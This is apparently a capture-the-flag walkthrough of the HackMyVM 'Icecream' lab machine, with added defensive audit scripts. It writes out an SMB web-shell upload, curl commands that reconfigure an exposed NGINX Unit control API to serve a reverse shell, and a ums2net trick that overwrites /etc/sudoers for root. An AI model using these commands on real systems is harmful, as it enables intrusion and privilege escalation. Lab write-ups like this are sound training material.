Target VM download: https://hackmyvm.eu/machines/machine.php?vm=Icecream
Tips: smb, nginx unit
First, scan the ports.
└─$ nmap -sV -sC -Pn -p- -oN port.log 192.168.56.131
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-09 16:53 CST
Nmap scan report for 192.168.56.131
Host is up (0.0022s latency).
Not shown: 65530 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0)
| ssh-hostkey:
| 256 68:94:ca:2f:f7:62:45:56:a4:67:84:59:1b:fe:e9:bc (ECDSA)
|_ 256 3b:79:1a:21:81:af:75:c2:c1:2e:4e:f5:a3:9c:c9:e3 (ED25519)
80/tcp open http nginx 1.22.1
|_http-server-header: nginx/1.22.1
|_http-title: 403 Forbidden
139/tcp open netbios-ssn Samba smbd 4.6.2
445/tcp open netbios-ssn Samba smbd 4.6.2
9000/tcp open cslistener?
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.1 404 Not Found
| Server: Unit/1.33.0
| Date: Wed, 09 Oct 2024 08:54:00 GMT
| Content-Type: application/json
| Content-Length: 40
| Connection: close
| "error": "Value doesn't exist."
| GetRequest:
| HTTP/1.1 200 OK
| Server: Unit/1.33.0
| Date: Wed, 09 Oct 2024 08:54:00 GMT
| Content-Type: application/json
| Content-Length: 1042
| Connection: close
| "certificates": {},
| "js_modules": {},
| "config": {
| "listeners": {},
| "routes": [],
| "applications": {}
| "status": {
| "modules": {
| "python": {
| "version": "3.11.2",
| "lib": "/usr/lib/unit/modules/python3.11.unit.so"
| "php": {
| "version": "8.2.18",
| "lib": "/usr/lib/unit/modules/php.unit.so"
| "perl": {
| "version": "5.36.0",
| "lib": "/usr/lib/unit/modules/perl.unit.so"
| "ruby": {
| "version": "3.1.2",
| "lib": "/usr/lib/unit/modules/ruby.unit.so"
| "java": {
| "version": "17.0.11",
| "lib": "/usr/lib/unit/modules/java17.unit.so"
| "wasm": {
| "version": "0.1",
| "lib": "/usr/lib/unit/modules/wasm.unit.so"
| HTTPOptions:
| HTTP/1.1 405 Method Not Allowed
| Server: Unit/1.33.0
| Date: Wed, 09 Oct 2024 08:54:00 GMT
| Content-Type: application/json
| Content-Length: 35
| Connection: close
|_ "error": "Invalid method."
...
Host script results:
|_clock-skew: -3s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2024-10-09T08:54:00
|_ start_date: N/A
|_nbstat: NetBIOS name: ICECREAM, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
Look at SMB.
└─$ smbclient -L 192.168.56.131
Password for [WORKGROUP\kali]:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
icecream Disk tmp Folder
IPC$ IPC IPC Service (Samba 4.17.12-Debian)
nobody Disk Home Directories
Reconnecting with SMB1 for workgroup listing.
smbXcli_negprot_smb1_done: No compatible protocol selected by server.
Protocol negotiation to server 192.168.56.131 (for a protocol between LANMAN1 and NT1) failed: NT_STATUS_INVALID_NETWORK_RESPONSE
Unable to connect with SMB1 -- no workgroup available
The icecream share turns out to be accessible.
└─$ smbclient //192.168.56.131/icecream
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Wed Oct 9 17:00:27 2024
.. D 0 Sun Oct 6 18:06:38 2024
systemd-private-b238b0dcf43042739385d0601be011ce-systemd-logind.service-BbUmJA D 0 Wed Oct 9 16:50:27 2024
.font-unix DH 0 Wed Oct 9 16:50:26 2024
.XIM-unix DH 0 Wed Oct 9 16:50:26 2024
.ICE-unix DH 0 Wed Oct 9 16:50:26 2024
systemd-private-b238b0dcf43042739385d0601be011ce-systemd-timesyncd.service-E22qPs D 0 Wed Oct 9 16:50:26 2024
.X11-unix DH 0 Wed Oct 9 16:50:26 2024
19480400 blocks of size 1024. 16159828 blocks available
Upload a placeholder html file; it turns out the file can be reached on port 80.
└─$ echo hello > index.html
...
smb: \> put index.html
putting file index.html as \index.html (0.8 kb/s) (average 0.8 kb/s)
...
└─$ curl http://192.168.56.131/index.html
hello
Upload a shell, access it through port 80, and get the first shell.
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Checking the home directory, there is only the ice user, so the next step is working out how to become ice. The ice user runs the nginx unit service, so it looks like nginx unit is the way to ice.
$ ps aux|grep ice
root 378 0.0 0.1 11772 2796 ? Ss 10:50 0:00 unit: main v1.33.0 [/usr/sbin/unitd --control 0.0.0.0:9000 --user ice]
ice 515 0.0 0.1 11128 2156 ? S 10:50 0:00 unit: controller
ice 516 0.0 0.3 102424 7020 ? Sl 10:50 0:00 unit: router
ice 12861 0.0 1.0 203620 21644 ? S 11:46 0:00 unit: "app" prototype
ice 12862 0.0 0.7 220144 14692 ? S 11:46 0:00 unit: "app" application
ice 12864 0.0 0.5 220144 10404 ? Ss 11:47 0:00 unit: "app" application
ice 12865 0.0 0.0 2576 892 ? S 11:47 0:00 sh -c uname -a; w; id; /bin/sh -i
ice 12869 0.0 0.0 2576 900 ? S 11:47 0:00 /bin/sh -i
First upload another reverse shell, rev2.php, to /tmp, then run the following commands so that the unit service can reach rev2.php (thanks to Todd). The first command adds an application, the second adds a route, and the third adds a listener.
curl -X PUT -d '{"app":{"type":"php","root":"/tmp","script":"rev2.php"}}' http://192.168.56.131:9000/config/applications
curl -X PUT -d '[{"action":{"share":"/tmp/rev2.php$uri","fallback":{"pass":"applications/app"}}}]' http://192.168.56.131:9000/config/routes
curl -X PUT -d '{"*:8888":{"pass":"routes"}}' http://192.168.56.131:9000/config/listeners
Visit 192.168.56.131:8888/rev2.php to get the shell.
$ id
uid=1000(ice) gid=1000(ice) grupos=1000(ice),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),100(users),106(netdev),110(bluetooth)
Of course, the commands above can be condensed further.
└─$ curl -X PUT -d '{
"listeners": {
"*:8080": {
"pass": "applications/php-app"
}
},
"applications": {
"php-app": {
"type": "php",
"root": "/tmp",
"script": "rev2.php"
}
}
}' http://192.168.56.131:9000/config
{
"success": "Reconfiguration done."
}
└─$ curl http://192.168.56.131:8080
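As an added defender-side check (not part of the original writeup), the script below parses the unitd command line seen in ps above and a configuration of the shape pushed through the control API, and flags the three conditions that made this path possible: a control API bound to a non-loopback address, an application whose root is a world-writable directory, and a wildcard listener pointing at that application. The command line and the JSON are constructed samples modelled on the output above.

```python
import json
import shlex
from ipaddress import ip_address

# Constructed sample: the unitd command line seen in `ps` above and a config of the
# shape pushed through the control API (shape follows Unit's JSON; values assumed).
UNITD_CMDLINE = "/usr/sbin/unitd --control 0.0.0.0:9000 --user ice"
SAMPLE_STATE = json.loads("""{"config": {
  "listeners": {"*:8080": {"pass": "applications/php-app"}},
  "routes": [],
  "applications": {"php-app": {"type": "php", "root": "/tmp", "script": "rev2.php"}}}}""")

WORLD_WRITABLE_ROOTS = ("/tmp", "/var/tmp", "/dev/shm")


def control_socket_is_exposed(cmdline: str) -> bool:
    """True when --control binds a TCP address that is not loopback."""
    args = shlex.split(cmdline)
    if "--control" not in args:
        return False  # unitd's default control socket is a unix socket
    addr = args[args.index("--control") + 1]
    if addr.startswith("unix:"):
        return False
    host = addr.rpartition(":")[0].strip("[]")
    if host in ("", "*"):
        return True  # wildcard bind
    try:
        return not ip_address(host).is_loopback
    except ValueError:
        return host != "localhost"


def audit_unit(cmdline: str, state: dict) -> list:
    """Return human-readable findings for the exposure pattern used on this box."""
    findings = []
    if control_socket_is_exposed(cmdline):
        findings.append("control API reachable over the network, no authentication")
    cfg = state.get("config", {})
    for name, app in cfg.get("applications", {}).items():
        root = app.get("root", "")
        if any(root == d or root.startswith(d + "/") for d in WORLD_WRITABLE_ROOTS):
            findings.append(f"application {name!r} runs code from world-writable {root}")
    for addr, listener in cfg.get("listeners", {}).items():
        if addr.startswith("*:") and listener.get("pass", "").startswith("applications/"):
            findings.append(f"listener {addr} exposes {listener['pass']} on all interfaces")
    return findings
```

On a live host the command line comes from ps and the state from a GET against the control socket; the fix is to bind --control to a unix socket or loopback and to keep application roots out of /tmp.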
Upload id_rsa.pub to ice's .ssh directory and rename it authorized_keys; remember to set the .ssh directory to 700 and the file to 600. Then ssh in directly as ice. Check sudo.
ice@icecream:~$ sudo -l
Matching Defaults entries for ice on icecream:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
use_pty
User ice may run the following commands on icecream:
(ALL) NOPASSWD: /usr/sbin/ums2net
Looking into how ums2net is used: essentially, it writes whatever arrives on a port to an arbitrary file. There are many ways forward from here; this one overwrites /etc/sudoers. On the local machine, create a sudoers file with the following content.
└─$ cat sudoers
ice ALL=(ALL) NOPASSWD: ALL
Create a.conf as follows.
ice@icecream:~$ echo '8080 of=/etc/sudoers' > /tmp/a.conf
Run ums2net.
ice@icecream:~$ sudo /usr/sbin/ums2net -c /tmp/a.conf -d
Then, from the local machine, send sudoers to port 8080.
└─$ nc 192.168.56.131 8080 < sudoers
Interrupt with Ctrl+C; the target shows that the data was received.
ice@icecream:~$ sudo /usr/sbin/ums2net -c /tmp/a.conf -d
ums2net[780]: Totally write 28 bytes to /etc/sudoers
Run sudo -l on the target again; it now shows that any command may be run as root.
User ice may run the following commands on icecream:
(ALL) NOPASSWD: ALL
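As an added defender-side check (not from the original writeup), the script below parses sudo -l output like the two listings above and flags the rule shapes that led to root here: a NOPASSWD grant for ums2net with no argument restriction, and the blanket ALL that replaced it. The sample output is taken from the page; the list of file-writing tools is an assumption to be extended per host.

```python
import re

# Constructed sample: the two `sudo -l` outputs shown above, before and after
# /etc/sudoers was overwritten through ums2net.
SUDO_L_BEFORE = """User ice may run the following commands on icecream:
    (ALL) NOPASSWD: /usr/sbin/ums2net"""
SUDO_L_AFTER = """User ice may run the following commands on icecream:
    (ALL) NOPASSWD: ALL"""

# Assumed allowlist of binaries that copy a socket or stdin into a path the caller
# chooses (ums2net does this through its config file, as the writeup shows);
# extend it with whatever such tools exist on the host being audited.
ARBITRARY_WRITE_TOOLS = {"/usr/sbin/ums2net"}

# Matches one rule line from `sudo -l`: "(runas) TAG: TAG: command [args]".
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+)$")


def audit_sudo_rules(sudo_l_output: str) -> list:
    """Return (command, reason) pairs for rules that hand the user root."""
    findings = []
    for line in sudo_l_output.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue  # header lines and Defaults are not rules
        nopasswd = "NOPASSWD" in m.group("tags")
        for spec in m.group("cmd").split(","):
            binary, _, args = spec.strip().partition(" ")
            if binary == "ALL":
                findings.append((binary, "any command as root" + (", no password" if nopasswd else "")))
            elif binary in ARBITRARY_WRITE_TOOLS and not args:
                findings.append((binary, "unrestricted arguments on a tool that writes caller-chosen files"))
    return findings
```

The mitigation the check points at is pinning the argument list in the sudoers rule (a fixed config path) so the user cannot supply their own config.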
Finally, root.
ice@icecream:~$ sudo bash
/etc/sudoers:2:11: error de sintaxis
with the 'visudo' command as root.
^~~~~~~~
root@icecream:/home/ice# id
uid=0(root) gid=0(root) grupos=0(root)
root@icecream:/home/ice#